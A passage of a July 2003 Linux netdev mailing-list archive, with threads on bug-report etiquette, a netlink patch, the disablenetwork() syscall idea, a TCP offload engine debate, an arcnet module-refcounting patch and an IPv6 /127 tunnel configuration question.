multipart/signed; boundary="=-=-="; micalg=pgp-sha1; protocol="application/pgp-signature" X-archive-position: 3988 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jan@rychter.com Precedence: bulk X-list: netdev --=-=-= Content-Transfer-Encoding: quoted-printable >>>>> "David" =3D=3D David S Miller writes: David> On Sat, 12 Jul 2003 10:07:42 -0700 David> Jan Rychter wrote: >> Interesting you should think you're 'rewarding' people. I thought >> your goal was to have fun working on cool software and making it >> better. I also thought I had the same goal as a bug-reporter. >> >> When I write software, I care about every bug report and consider >> people doing the reporting a very valuable resource. David> The whole game changes when you are stretched as thinly as I am. David> Scaling becomes everything, and nitpicking through vague and David> poorly composed bug reports is an absolute waste of my time as David> networking subsystem maintainer. [...] Couldn't agree more. Especially after having benefited from your code so much (starting back in the early sparc days...). David> Having me pillage through a bug database is a poor use of my David> time and capabilities. And all of my time is spent reviewing David> patches and dealing with the properly composed bug reports David> anyways, so even if I enjoyed pillaging through badly made bug David> reports I couldn't. David> People are assuming that just because _I_ don't want to work on David> the bad bug reports that I think nobody should. It's the exact David> opposite. [...] Thanks for this explanation -- I responded because I was worried you were convincing people that it's a good thing if bug reports get dropped, because the really important ones will float to the top anyway. =2D-J. --=-=-= Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.2 (GNU/Linux) iD8DBQA/EPFOLth4/7/QhDoRAjf+AKC59JVBV7nrxiu6AhOik4DdIWAriwCeMBrV c0f29cO6CjS03BBunvl4J0Q= =0WVV -----END PGP SIGNATURE----- --=-=-=-- From davem@redhat.com Sat Jul 12 22:44:32 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 12 Jul 2003 22:45:05 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6D5hpFl020209 for ; Sat, 12 Jul 2003 22:44:32 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id WAA01514; Sat, 12 Jul 2003 22:34:49 -0700 Date: Sat, 12 Jul 2003 22:34:49 -0700 From: "David S. Miller" To: James Morris Cc: jkenisto@us.ibm.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, akpm@osdl.org, jgarzik@pobox.com, alan@lxorguk.ukuu.org.uk, rddunlap@osdl.org, kuznet@ms2.inr.ac.ru Subject: Re: [PATCH - RFC] [1/2] 2.6 must-fix list - kernel error reporting Message-Id: <20030712223449.550d822a.davem@redhat.com> In-Reply-To: References: <20030711224142.557b5b5e.davem@redhat.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3989 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Sun, 13 Jul 2003 11:17:35 +1000 (EST) James Morris wrote: > On Fri, 11 Jul 2003, David S. Miller wrote: > > > Oops, turns out this doesn't work. data_ready is never NULL, look at > > how netlink_kernel_create() works. > > It's ok: sk->data_ready is never null, but nlk_sk(sk)->data_ready will be > null unless an input function is provided there. > > > Also, the broadcast case probably needs to be handled > > too? > > Netlink sockets created by netlink_kernel_create() do not subscribe to any > groups and are not broadcast to. Oops, you're right on both counts, I brainfarted here. I'll apply your original patch, thanks. From pekkas@netcore.fi Sun Jul 13 00:05:27 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 00:06:00 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6D74jFl021993 for ; Sun, 13 Jul 2003 00:05:27 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6D74dB20158 for ; Sun, 13 Jul 2003 10:04:40 +0300 Date: Sun, 13 Jul 2003 10:04:39 +0300 (EEST) From: Pekka Savola To: netdev@oss.sgi.com Subject: Re: disablenetwork() syscall? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3990 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev FWIW, DJB created a (probably biased) web page: http://cr.yp.to/unix/disablenetwork.html to describe the idea and alternatives at a bit more length. On Tue, 8 Jul 2003, James Morris wrote: > On Mon, 7 Jul 2003, Pekka Savola wrote: > > > Hi, > > > > In a bugtraq thread, DJ Bernstein brought up an idea which I'm not sure > > has been brought up in the past. > > Such a feature already exists in SELinux. > > > I'm not sure whether it's feasible or > > not, but at least it (and other methods to limit the functions of a > > user-level code) might bear consideration. > > This is precisely what LSM is for, so new security models can be > implemented without any direct effect on the core kernel. > > > - James > -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From davem@redhat.com Sun Jul 13 00:48:20 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 00:48:36 -0700 (PDT) Received: from rth.ninka.net (rth.ninka.net [216.101.162.244]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6D7mJFl022499 for ; Sun, 13 Jul 2003 00:48:19 -0700 Received: from rth.ninka.net (localhost.localdomain [127.0.0.1]) by rth.ninka.net (8.12.8/8.12.8) with SMTP id h6D7mIxI009195; Sun, 13 Jul 2003 00:48:18 -0700 Date: Sun, 13 Jul 2003 00:48:18 -0700 From: "David S. Miller" To: "Alan Shih" Cc: linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: TCP IP Offloading Interface Message-Id: <20030713004818.4f1895be.davem@redhat.com> In-Reply-To: References: X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3991 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Sun, 13 Jul 2003 00:33:00 -0700 "Alan Shih" wrote: > Or TOE is a forbidden discussion? TOE is evil, read this: http://www.usenix.org/events/hotos03/tech/full_papers/mogul/mogul.pdf TOE is exactly suboptimal for the very things performance matters, high connection rates. Your return is also absolutely questionable. Servers "serve" data and we offload all of the send side TCP processing that can reasonably be done (segmentation, checksumming). I've never seen an impartial benchmark showing that TCP send side performance goes up as a result of using TOE vs. the usual segmentation + checksum offloading offered today. On receive side, clever RX buffer flipping tricks are the way to go and require no protocol changes and nothing gross like TOE or weird buffer ownership protocols like RDMA requires. I've made postings showing how such a scheme can work using a limited flow cache on the networking card. I don't have a reference handy, but I suppose someone else does. And finally, this discussion belongs on the "networking" lists. Nearly all of the "networking" developers don't have time to sift through linux-kernel every day. From hch@lst.de Sun Jul 13 07:38:06 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 07:38:15 -0700 (PDT) Received: from mail.lst.de (verein.lst.de [212.34.189.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6DEc4Fl002787 for ; Sun, 13 Jul 2003 07:38:05 -0700 Received: from verein.lst.de (localhost [127.0.0.1]) by mail.lst.de (8.12.3/8.12.3/Debian-6.4) with ESMTP id h6DCvnDC024415 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO) for ; Sun, 13 Jul 2003 14:57:49 +0200 Received: (from hch@localhost) by verein.lst.de (8.12.3/8.12.3/Debian-6.3) id h6DCvmud024413 for netdev@oss.sgi.com; Sun, 13 Jul 2003 14:57:48 +0200 Date: Sun, 13 Jul 2003 14:57:48 +0200 From: Christoph Hellwig To: netdev@oss.sgi.com Subject: [PATCH] fix arcnet module refcounting Message-ID: <20030713125748.GA24403@lst.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.28i X-Spam-Score: -3 () PATCH_UNIFIED_DIFF,USER_AGENT_MUTT X-Scanned-By: MIMEDefang 2.33 (www . roaringpenguin . com / mimedefang) X-archive-position: 3992 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: hch@lst.de Precedence: bulk X-list: netdev struct arnet_local needs a struct module *owner, that also cleans up nicely lots of the code. --- 1.6/drivers/net/arcnet/arc-rimi.c Sat Jun 28 08:20:41 2003 +++ edited/drivers/net/arcnet/arc-rimi.c Thu Jul 10 16:28:29 2003 @@ -47,7 +47,6 @@ static int arcrimi_status(struct net_device *dev); static void arcrimi_setmask(struct net_device *dev, int mask); static int arcrimi_reset(struct net_device *dev, int really_reset); -static void arcrimi_openclose(struct net_device *dev, bool open); static void arcrimi_copy_to_card(struct net_device *dev, int bufnum, int offset, void *buf, int count); static void arcrimi_copy_from_card(struct net_device *dev, int bufnum, int offset, @@ -179,7 +178,7 @@ lp->hw.status = arcrimi_status; lp->hw.intmask = arcrimi_setmask; lp->hw.reset = arcrimi_reset; - lp->hw.open_close = arcrimi_openclose; + lp->hw.owner = THIS_MODULE; lp->hw.copy_to_card = arcrimi_copy_to_card; lp->hw.copy_from_card = arcrimi_copy_from_card; lp->mem_start = ioremap(dev->mem_start, dev->mem_end - dev->mem_start + 1); @@ -252,15 +251,6 @@ /* done! return success. */ return 0; -} - - -static void arcrimi_openclose(struct net_device *dev, int open) -{ - if (open) - MOD_INC_USE_COUNT; - else - MOD_DEC_USE_COUNT; } static void arcrimi_setmask(struct net_device *dev, int mask) --- 1.14/drivers/net/arcnet/arcnet.c Sun Jun 15 01:16:09 2003 +++ edited/drivers/net/arcnet/arcnet.c Thu Jul 10 16:53:24 2003 @@ -343,7 +343,10 @@ static int arcnet_open(struct net_device *dev) { struct arcnet_local *lp = (struct arcnet_local *) dev->priv; - int count, newmtu; + int count, newmtu, error; + + if (!try_module_get(lp->hw.owner)) + return -ENODEV; BUGLVL(D_PROTO) { int count; @@ -360,8 +363,9 @@ /* try to put the card in a defined state - if it fails the first * time, actually reset it. */ + error = -ENODEV; if (ARCRESET(0) && ARCRESET(1)) - return -ENODEV; + goto out_module_put; newmtu = choose_mtu(); if (newmtu < dev->mtu) @@ -391,7 +395,7 @@ lp->rfc1201.sequence = 1; /* bring up the hardware driver */ - ARCOPEN(1); + lp->hw.open(dev); if (dev->dev_addr[0] == 0) BUGMSG(D_NORMAL, "WARNING! Station address 00 is reserved " @@ -415,6 +419,10 @@ netif_start_queue(dev); return 0; + + out_module_put: + module_put(lp->hw.owner); + return error; } @@ -432,8 +440,8 @@ mdelay(1); /* shut down the card */ - ARCOPEN(0); - + lp->hw.close(dev); + module_put(lp->hw.owner); return 0; } --- 1.5/drivers/net/arcnet/com20020-isa.c Thu May 22 10:08:06 2003 +++ edited/drivers/net/arcnet/com20020-isa.c Thu Jul 10 16:30:53 2003 @@ -131,14 +131,6 @@ MODULE_PARM(clockm, "i"); MODULE_LICENSE("GPL"); -static void com20020isa_open_close(struct net_device *dev, bool open) -{ - if (open) - MOD_INC_USE_COUNT; - else - MOD_DEC_USE_COUNT; -} - int init_module(void) { struct net_device *dev; @@ -160,7 +152,7 @@ lp->clockp = clockp & 7; lp->clockm = clockm & 3; lp->timeout = timeout & 3; - lp->hw.open_close_ll = com20020isa_open_close; + lp->owner = THIS_MODULE; dev->base_addr = io; dev->irq = irq; --- 1.13/drivers/net/arcnet/com20020-pci.c Thu May 22 10:08:06 2003 +++ edited/drivers/net/arcnet/com20020-pci.c Thu Jul 10 16:54:28 2003 @@ -60,14 +60,6 @@ MODULE_PARM(clockm, "i"); MODULE_LICENSE("GPL"); -static void com20020pci_open_close(struct net_device *dev, bool open) -{ - if (open) - MOD_INC_USE_COUNT; - else - MOD_DEC_USE_COUNT; -} - static int __devinit com20020pci_probe(struct pci_dev *pdev, const struct pci_device_id *id) { struct net_device *dev; @@ -111,7 +103,7 @@ lp->clockp = clockp & 7; lp->clockm = clockm & 3; lp->timeout = timeout; - lp->hw.open_close_ll = com20020pci_open_close; + lp->hw.owner = THIS_MODULE; if (check_region(ioaddr, ARCNET_TOTAL_SIZE)) { BUGMSG(D_INIT, "IO region %xh-%xh already allocated.\n", --- 1.5/drivers/net/arcnet/com20020.c Sat Feb 15 00:22:10 2003 +++ edited/drivers/net/arcnet/com20020.c Thu Jul 10 16:33:36 2003 @@ -50,13 +50,12 @@ static int com20020_status(struct net_device *dev); static void com20020_setmask(struct net_device *dev, int mask); static int com20020_reset(struct net_device *dev, int really_reset); -static void com20020_openclose(struct net_device *dev, bool open); static void com20020_copy_to_card(struct net_device *dev, int bufnum, int offset, void *buf, int count); static void com20020_copy_from_card(struct net_device *dev, int bufnum, int offset, void *buf, int count); static void com20020_set_mc_list(struct net_device *dev); - +static void com20020_close(struct net_device *, bool); static void com20020_copy_from_card(struct net_device *dev, int bufnum, int offset, void *buf, int count) @@ -162,13 +161,14 @@ lp = (struct arcnet_local *) dev->priv; + lp->hw.owner = THIS_MODULE; lp->hw.command = com20020_command; lp->hw.status = com20020_status; lp->hw.intmask = com20020_setmask; lp->hw.reset = com20020_reset; - lp->hw.open_close = com20020_openclose; lp->hw.copy_to_card = com20020_copy_to_card; lp->hw.copy_from_card = com20020_copy_from_card; + lp->hw.close = com20020_close; dev->set_multicast_list = com20020_set_mc_list; @@ -298,24 +298,17 @@ return ASTATUS(); } - -static void com20020_openclose(struct net_device *dev, bool open) +static void com20020_close(struct net_device *dev, bool open) { struct arcnet_local *lp = (struct arcnet_local *) dev->priv; int ioaddr = dev->base_addr; - if (open) { - MOD_INC_USE_COUNT; - } - else { + if (!open) { /* disable transmitter */ lp->config &= ~TXENcfg; SETCONF; - MOD_DEC_USE_COUNT; } - lp->hw.open_close_ll(dev, open); } - /* Set or clear the multicast filter for this adaptor. * num_addrs == -1 Promiscuous mode, receive all packets --- 1.7/drivers/net/arcnet/com90io.c Thu May 22 10:08:06 2003 +++ edited/drivers/net/arcnet/com90io.c Thu Jul 10 16:28:29 2003 @@ -47,7 +47,6 @@ static int com90io_status(struct net_device *dev); static void com90io_setmask(struct net_device *dev, int mask); static int com90io_reset(struct net_device *dev, int really_reset); -static void com90io_openclose(struct net_device *dev, bool open); static void com90io_copy_to_card(struct net_device *dev, int bufnum, int offset, void *buf, int count); static void com90io_copy_from_card(struct net_device *dev, int bufnum, int offset, @@ -257,7 +256,7 @@ lp->hw.status = com90io_status; lp->hw.intmask = com90io_setmask; lp->hw.reset = com90io_reset; - lp->hw.open_close = com90io_openclose; + lp->hw.owner = THIS_MODULE; lp->hw.copy_to_card = com90io_copy_to_card; lp->hw.copy_from_card = com90io_copy_from_card; @@ -342,14 +341,6 @@ short ioaddr = dev->base_addr; AINTMASK(mask); -} - -static void com90io_openclose(struct net_device *dev, int open) -{ - if (open) - MOD_INC_USE_COUNT; - else - MOD_DEC_USE_COUNT; } static void com90io_copy_to_card(struct net_device *dev, int bufnum, int offset, --- 1.7/drivers/net/arcnet/com90xx.c Thu May 22 10:08:06 2003 +++ edited/drivers/net/arcnet/com90xx.c Thu Jul 10 16:28:29 2003 @@ -58,7 +58,6 @@ static int com90xx_status(struct net_device *dev); static void com90xx_setmask(struct net_device *dev, int mask); static int com90xx_reset(struct net_device *dev, int really_reset); -static void com90xx_openclose(struct net_device *dev, bool open); static void com90xx_copy_to_card(struct net_device *dev, int bufnum, int offset, void *buf, int count); static void com90xx_copy_from_card(struct net_device *dev, int bufnum, int offset, @@ -450,7 +449,7 @@ lp->hw.status = com90xx_status; lp->hw.intmask = com90xx_setmask; lp->hw.reset = com90xx_reset; - lp->hw.open_close = com90xx_openclose; + lp->hw.owner = THIS_MODULE; lp->hw.copy_to_card = com90xx_copy_to_card; lp->hw.copy_from_card = com90xx_copy_from_card; lp->mem_start = ioremap(dev->mem_start, dev->mem_end - dev->mem_start + 1); @@ -569,16 +568,6 @@ /* done! return success. */ return 0; } - - -static void com90xx_openclose(struct net_device *dev, bool open) -{ - if (open) - MOD_INC_USE_COUNT; - else - MOD_DEC_USE_COUNT; -} - static void com90xx_copy_to_card(struct net_device *dev, int bufnum, int offset, void *buf, int count) --- 1.4/include/linux/arcdevice.h Sun Jun 15 01:16:09 2003 +++ edited/include/linux/arcdevice.h Thu Jul 10 16:48:24 2003 @@ -291,12 +291,13 @@ /* hardware-specific functions */ struct { + struct module *owner; void (*command) (struct net_device * dev, int cmd); int (*status) (struct net_device * dev); void (*intmask) (struct net_device * dev, int mask); bool (*reset) (struct net_device * dev, bool really_reset); - void (*open_close) (struct net_device * dev, bool open); - void (*open_close_ll) (struct net_device * dev, bool open); + void (*open) (struct net_device * dev); + void (*close) (struct net_device * dev); void (*copy_to_card) (struct net_device * dev, int bufnum, int offset, void *buf, int count); @@ -312,7 +313,6 @@ #define ACOMMAND(x) (lp->hw.command(dev, (x))) #define ASTATUS() (lp->hw.status(dev)) #define AINTMASK(x) (lp->hw.intmask(dev, (x))) -#define ARCOPEN(x) (lp->hw.open_close(dev, (x))) From linux-netdev@gmane.org Sun Jul 13 07:51:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 07:51:21 -0700 (PDT) Received: from main.gmane.org (main.gmane.org [80.91.224.249]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6DEpEFl003158 for ; Sun, 13 Jul 2003 07:51:15 -0700 Received: from root by main.gmane.org with local (Exim 3.35 #1 (Debian)) id 19biB9-0006BM-00 for ; Sun, 13 Jul 2003 16:50:19 +0200 X-Injected-Via-Gmane: http://gmane.org/ To: netdev@oss.sgi.com Received: from news by main.gmane.org with local (Exim 3.35 #1 (Debian)) id 19bi9I-000649-00 for ; Sun, 13 Jul 2003 16:48:24 +0200 From: Anand Kumria Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked Date: Mon, 14 Jul 2003 00:49:17 +1000 Lines: 38 Message-ID: References: <20030711.005542.04973601.yoshfuji@linux-ipv6.org> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Complaints-To: usenet@main.gmane.org User-Agent: Pan/0.11.2 (Unix) X-Comment-To: "Pekka Savola" X-archive-position: 3993 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: wildfire@progsoc.org Precedence: bulk X-list: netdev On Fri, 11 Jul 2003 02:08:20 +1000, Pekka Savola wrote: > On Fri, 11 Jul 2003, YOSHIFUJI Hideaki / [iso-2022-jp] $B5HF#1QL@(B > wrote: >> In article <20030710154302.GE1722@zip.com.au> (at Fri, 11 Jul 2003 >> 01:43:03 +1000), CaT says: >> >> > With 2.4.21-pre2 I can get a nice tunnel going over my ppp connection >> > and as such get ipv6 connectivity. I think went to 2.4.21 and then to >> > 2.4.22-pre4 and bringing up the tunnel fails as follows: >> : >> > ip addr add 3ffe:8001:000c:ffff::37/127 dev sit1 >> > ip route add ::/0 via 3ffe:8001:000c:ffff::36 >> > RTNETLINK answers: Invalid argument >> >> This is not bug, but rather misconfiguration; you cannot use prefix::, >> which is mandatory subnet routers anycast address, as unicast address. I'm the other end of this link, so I'm wondering how this is a misconfiguration. RFC3513 2.6.1 suggests to me that 3ffe:8001:c:ffff::36/127 is the router address (my end) and the other side should be 3ffe:8001:c:ffff::37/127. > While technically correct, I'm still not sure if this is (pragmatically) > the correct approach. It's OK to set a default route to go to the > subnet routers anycast address (so, setting a route to prefix:: should > not give you EINVAL). > Both Yoshifuji and yourself suggested that /127 isn't the way to go and that this is something v6ops ought to take up. I had a quick look at the v6ops IETF group and nothing struck me. What would you recommend I look at to see why /127 is a bad idea or /64 is a better idea than /127? Thanks, Anand From pekkas@netcore.fi Sun Jul 13 09:23:18 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 09:23:23 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6DGNGFl004187 for ; Sun, 13 Jul 2003 09:23:17 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6DGN5823685; Sun, 13 Jul 2003 19:23:05 +0300 Date: Sun, 13 Jul 2003 19:23:05 +0300 (EEST) From: Pekka Savola To: Anand Kumria cc: netdev@oss.sgi.com Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 X-archive-position: 3995 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev See http://www.ietf.org/internet-drafts/draft-savola-ipv6-127-prefixlen-04.txt it should answer your questions. On Mon, 14 Jul 2003, Anand Kumria wrote: > On Fri, 11 Jul 2003 02:08:20 +1000, Pekka Savola wrote: > > > On Fri, 11 Jul 2003, YOSHIFUJI Hideaki / [iso-2022-jp] $B5HF#1QL@(B > > wrote: > >> In article <20030710154302.GE1722@zip.com.au> (at Fri, 11 Jul 2003 > >> 01:43:03 +1000), CaT says: > >> > >> > With 2.4.21-pre2 I can get a nice tunnel going over my ppp connection > >> > and as such get ipv6 connectivity. I think went to 2.4.21 and then to > >> > 2.4.22-pre4 and bringing up the tunnel fails as follows: > >> : > >> > ip addr add 3ffe:8001:000c:ffff::37/127 dev sit1 > >> > ip route add ::/0 via 3ffe:8001:000c:ffff::36 > >> > RTNETLINK answers: Invalid argument > >> > >> This is not bug, but rather misconfiguration; you cannot use prefix::, > >> which is mandatory subnet routers anycast address, as unicast address. > > I'm the other end of this link, so I'm wondering how this is a > misconfiguration. RFC3513 2.6.1 suggests to me that > 3ffe:8001:c:ffff::36/127 is the router address (my end) and the other > side should be 3ffe:8001:c:ffff::37/127. > > > While technically correct, I'm still not sure if this is (pragmatically) > > the correct approach. It's OK to set a default route to go to the > > subnet routers anycast address (so, setting a route to prefix:: should > > not give you EINVAL). > > > > Both Yoshifuji and yourself suggested that /127 isn't the way to go and > that this is something v6ops ought to take up. I had a quick look at the > v6ops IETF group and nothing struck me. > > What would you recommend I look at to see why /127 is a bad idea or /64 > is a better idea than /127? > > Thanks, > Anand > > -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From roland@topspin.com Sun Jul 13 09:22:38 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 09:22:45 -0700 (PDT) Received: from umhlanga.STRATNET.NET (mail.netapps.org [12.162.17.40]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6DGMbFl004123 for ; Sun, 13 Jul 2003 09:22:38 -0700 Received: from exch-1.topspincom.com ([12.162.17.3]) by umhlanga.STRATNET.NET with Microsoft SMTPSVC(5.0.2195.5329); Sun, 13 Jul 2003 09:22:35 -0700 Received: from gold ([10.10.253.60] unverified) by exch-1.topspincom.com with Microsoft SMTPSVC(5.0.2195.5329); Sun, 13 Jul 2003 09:22:34 -0700 Received: from roland by gold with local (Exim 3.35 #1 (Debian)) id 19bjcO-0001mp-00; Sun, 13 Jul 2003 09:22:32 -0700 To: "David S. Miller" Cc: "Alan Shih" , linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: TCP IP Offloading Interface References: <20030713004818.4f1895be.davem@redhat.com> X-Message-Flag: Warning: May contain useful information X-Priority: 1 X-MSMail-Priority: High From: Roland Dreier Date: 13 Jul 2003 09:22:32 -0700 In-Reply-To: <20030713004818.4f1895be.davem@redhat.com> Message-ID: <52u19qwg53.fsf@topspin.com> Lines: 43 User-Agent: Gnus/5.0808 (Gnus v5.8.8) XEmacs/21.4 (Common Lisp) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-OriginalArrivalTime: 13 Jul 2003 16:22:34.0890 (UTC) FILETIME=[F7BF4EA0:01C3495A] X-archive-position: 3994 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: roland@topspin.com Precedence: bulk X-list: netdev David> TOE is evil, read this: David> http://www.usenix.org/events/hotos03/tech/full_papers/mogul/mogul.pdf David> TOE is exactly suboptimal for the very things performance David> matters, high connection rates. David> Your return is also absolutely questionable. Servers David> "serve" data and we offload all of the send side TCP David> processing that can reasonably be done (segmentation, David> checksumming). David> I've never seen an impartial benchmark showing that TCP David> send side performance goes up as a result of using TOE David> vs. the usual segmentation + checksum offloading offered David> today. David> On receive side, clever RX buffer flipping tricks are the David> way to go and require no protocol changes and nothing gross David> like TOE or weird buffer ownership protocols like RDMA David> requires. David> I've made postings showing how such a scheme can work using David> a limited flow cache on the networking card. I don't have David> a reference handy, but I suppose someone else does. Your ideas are certainly very interesting, and I would be happy to see hardware that supports flow identification. But the Usenix paper you're citing completely disagrees with you! For example, Mogul writes: "Nevertheless, copy-avoidance designs have not been widely adopted, due to significant limitations. For example, when network maximum segment size (MSS) values are smaller than VM page sizes, which is often the case, page-remapping techniques are insufficient (and page-remapping often imposes overheads of its own.)" In fact, his conclusion is: "However, as hardware trends change the feasibility and economics of network-based storage connections, RDMA will become a significant and appropriate justification for TOEs." - Roland From alan@lxorguk.ukuu.org.uk Sun Jul 13 09:34:15 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 09:34:19 -0700 (PDT) Received: from lxorguk.ukuu.org.uk (pc2-cwma1-4-cust86.swan.cable.ntl.com [213.105.254.86]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6DGYEFl005312 for ; Sun, 13 Jul 2003 09:34:15 -0700 Received: from dhcp22.swansea.linux.org.uk (dhcp22.swansea.linux.org.uk [127.0.0.1]) by lxorguk.ukuu.org.uk (8.12.8/8.12.5) with ESMTP id h6DGVcKd000604; Sun, 13 Jul 2003 17:31:38 +0100 Received: (from alan@localhost) by dhcp22.swansea.linux.org.uk (8.12.8/8.12.8/Submit) id h6DGVZn3000602; Sun, 13 Jul 2003 17:31:35 +0100 X-Authentication-Warning: dhcp22.swansea.linux.org.uk: alan set sender to alan@lxorguk.ukuu.org.uk using -f Subject: Re: TCP IP Offloading Interface From: Alan Cox To: Roland Dreier Cc: "David S. Miller" , Alan Shih , Linux Kernel Mailing List , linux-net@vger.kernel.org, netdev@oss.sgi.com In-Reply-To: <52u19qwg53.fsf@topspin.com> References: <20030713004818.4f1895be.davem@redhat.com> <52u19qwg53.fsf@topspin.com> Content-Type: text/plain Content-Transfer-Encoding: 7bit Organization: Message-Id: <1058113895.554.7.camel@dhcp22.swansea.linux.org.uk> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.2.2 (1.2.2-5) Date: 13 Jul 2003 17:31:35 +0100 X-archive-position: 3996 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: alan@lxorguk.ukuu.org.uk Precedence: bulk X-list: netdev On Sul, 2003-07-13 at 17:22, Roland Dreier wrote: > Your ideas are certainly very interesting, and I would be happy to see > hardware that supports flow identification. But the Usenix paper > you're citing completely disagrees with you! For example, Mogul writes: Take a look at who holds the official internet land speed record. Its not a TOE using system. > "Nevertheless, copy-avoidance designs have not been widely adopted, > due to significant limitations. For example, when network maximum > segment size (MSS) values are smaller than VM page sizes, which is > often the case, page-remapping techniques are insufficient (and > page-remapping often imposes overheads of its own.)" Page remapping is adequate for send of data when the MSS is below the VM page size since you don't have to send all of the page you pinned or set COW/SOW (sleep on write) For receive if your hardware can do demux from the tcp headers and expecting sequence then page remapping isn't needed either. Finally if you are streaming objects by non mapped references (eg sendfile or see LM's paper from long ago on splice()) then the problem goes away. > In fact, his conclusion is: > > "However, as hardware trends change the feasibility and economics of > network-based storage connections, RDMA will become a significant > and appropriate justification for TOEs." > > - Roland > - > To unsubscribe from this list: send the line "unsubscribe linux-kernel" in > the body of a message to majordomo@vger.kernel.org > More majordomo info at http://vger.kernel.org/majordomo-info.html > Please read the FAQ at http://www.tux.org/lkml/ From jgarzik@pobox.com Sun Jul 13 09:50:14 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 09:50:19 -0700 (PDT) Received: from www.linux.org.uk (IDENT:yJAaINogrkOb0+tSqMHBJ9/bzzCG3CKg@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6DGoCFl006235 for ; Sun, 13 Jul 2003 09:50:13 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19bk39-000466-IV; Sun, 13 Jul 2003 17:50:11 +0100 Message-ID: <3F118DB7.5060009@pobox.com> Date: Sun, 13 Jul 2003 12:49:59 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: Alan Cox CC: Roland Dreier , "David S. Miller" , Alan Shih , Linux Kernel Mailing List , linux-net@vger.kernel.org, 